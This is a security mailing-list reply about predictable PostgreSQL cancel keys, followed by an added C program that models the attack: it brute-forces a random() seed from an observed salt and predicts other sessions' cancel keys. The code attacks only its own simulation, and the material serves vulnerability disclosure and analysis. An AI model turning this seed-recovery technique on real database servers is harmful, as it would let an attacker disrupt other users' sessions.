oss-sec mailing list archives

Re: PostgreSQL - Predictable cancel key


From: Michael Samuel <mik () miknet net>
Date: Tue, 16 Jun 2015 21:04:52 +1000

Hi,

On 16 June 2015 at 20:15, Pierre Schweitzer <pierre () reactos org> wrote:

> Well, I've thought about it, but that's still one million seeds and
> the cancel key you're looking for might have been generated after
> several random() call. So, that means perhaps 10 millions values to
> explore? (If we make the hypothesis that for a given initialization,
> it will only draw 10 PRN)


This is CPU, maybe GPU territory. 2^15-2 * 10m =~ 2^38 work offline.


> How relevant would still be your cancel key once you found it?


In the postmaster mainloop:

ConnCreate()
    RandomSalt() -- the md5Salt craziness in the original post
BackendStartup()
    MyCancelKey = PostmasterRandom();

No other calls to random(), srandom() that I can see, and the other calls
to PostmasterRandom() are generating cancel keys for worker procs.

So if you brute the md5Salt you have a pretty good chance of guessing
something that was/is/will be a cancel key of another session.

Regards,
  Michael
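
Added illustration of the search Michael sketches above; this is not code from the thread or from PostgreSQL. It is a C model in which the "server" seeds libc random() from a roughly one-million-value seed space, spends a few draws on earlier sessions' cancel keys, hands out a four-byte salt built from the next four draws, and the "attacker" then enumerates every (seed, offset) pair whose stream reproduces that salt and replays the winner to predict the draw that follows it. The seed range 1..999999, the cap of 16 draws before the observed salt, the salt-byte mapping (rand % 255) + 1, the secret seed 424242 and the names server_session, recover_seed, predict_next_key and demo are my assumptions for the model, not PostgreSQL's actual code.

```c
/*
 * Constructed model (not PostgreSQL code) of recovering a libc random()
 * seed from a public md5Salt and predicting later cancel keys.
 *
 * Assumptions: seed is a microsecond-like value in 1..999999, the salt
 * is four draws mapped to 1..255, every other draw is a cancel key, and
 * at most MAX_PRIOR draws were consumed before the salt we observe.
 */
#define _DEFAULT_SOURCE
#include <stdio.h>
#include <stdlib.h>

#define SEED_SPACE  1000000U   /* assumed: ~one million candidate seeds */
#define MAX_PRIOR   16U        /* assumed: draws consumed before our salt */
#define SALT_LEN    4
#define MAX_MATCHES 8

struct match { unsigned seed, offset; };

/* Map a raw draw to a non-NUL salt byte (assumed mapping). */
static unsigned char salt_byte(long draw) { return (unsigned char)((draw % 255) + 1); }

/* "Server": seed once, burn `prior` draws on earlier backends, emit a salt,
 * then return the cancel key handed to the next backend. */
long server_session(unsigned seed, unsigned prior, unsigned char salt[SALT_LEN])
{
    srandom(seed);
    for (unsigned i = 0; i < prior; i++) (void)random();
    for (int i = 0; i < SALT_LEN; i++) salt[i] = salt_byte(random());
    return random();
}

/* "Attacker": try every seed and every offset up to max_prior; a candidate
 * matches when its next four draws reproduce the observed salt. Returns the
 * total number of matches (only the first `max` are stored in `out`). */
unsigned recover_seed(const unsigned char salt[SALT_LEN], unsigned max_prior,
                      struct match *out, unsigned max)
{
    long buf[MAX_PRIOR + SALT_LEN];
    unsigned n = 0;
    if (max_prior > MAX_PRIOR) max_prior = MAX_PRIOR;
    for (unsigned seed = 1; seed < SEED_SPACE; seed++) {
        srandom(seed);
        for (unsigned k = 0; k < max_prior + SALT_LEN; k++) buf[k] = random();
        for (unsigned off = 0; off <= max_prior; off++) {
            int ok = 1;
            for (int i = 0; i < SALT_LEN && ok; i++)
                ok = (salt_byte(buf[off + i]) == salt[i]);
            if (ok) {
                if (n < max) { out[n].seed = seed; out[n].offset = off; }
                n++;
            }
        }
    }
    return n;
}

/* Replay a recovered (seed, offset) and return the draw right after the salt,
 * i.e. the next backend's cancel key in this model. */
long predict_next_key(struct match m)
{
    srandom(m.seed);
    for (unsigned i = 0; i < m.offset + SALT_LEN; i++) (void)random();
    return random();
}

/* End-to-end run: returns 1 when the true (seed, offset) is among the
 * candidates and replaying it yields the real next cancel key. */
int demo(unsigned secret_seed, unsigned prior)
{
    unsigned char salt[SALT_LEN];
    struct match found[MAX_MATCHES];
    long real_key = server_session(secret_seed, prior, salt);
    unsigned n = recover_seed(salt, MAX_PRIOR, found, MAX_MATCHES);
    int hit = 0;
    printf("salt %02x%02x%02x%02x: %u candidate(s)\n",
           salt[0], salt[1], salt[2], salt[3], n);
    for (unsigned i = 0; i < n && i < MAX_MATCHES; i++) {
        long guess = predict_next_key(found[i]);
        printf("  seed=%u offset=%u predicted key=%ld (real %ld)\n",
               found[i].seed, found[i].offset, guess, real_key);
        if (found[i].seed == secret_seed && found[i].offset == prior && guess == real_key)
            hit = 1;
    }
    return hit;
}

int main(void)
{
    /* Constructed scenario: secret seed 424242, seven draws before our salt. */
    return demo(424242, 7) ? 0 : 1;
}
```

The inner loop does SEED_SPACE * (MAX_PRIOR + 1) salt comparisons, which is exactly the "seeds times draws" product the thread is estimating; the 2^38 figure in the mail is this same loop with larger bounds, and it parallelises trivially across cores or a GPU because each seed is independent. Offsets before the salt correspond to cancel keys of sessions that already exist, and the draws after it to sessions not yet started, which is why a recovered seed is useful both backwards and forwards.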
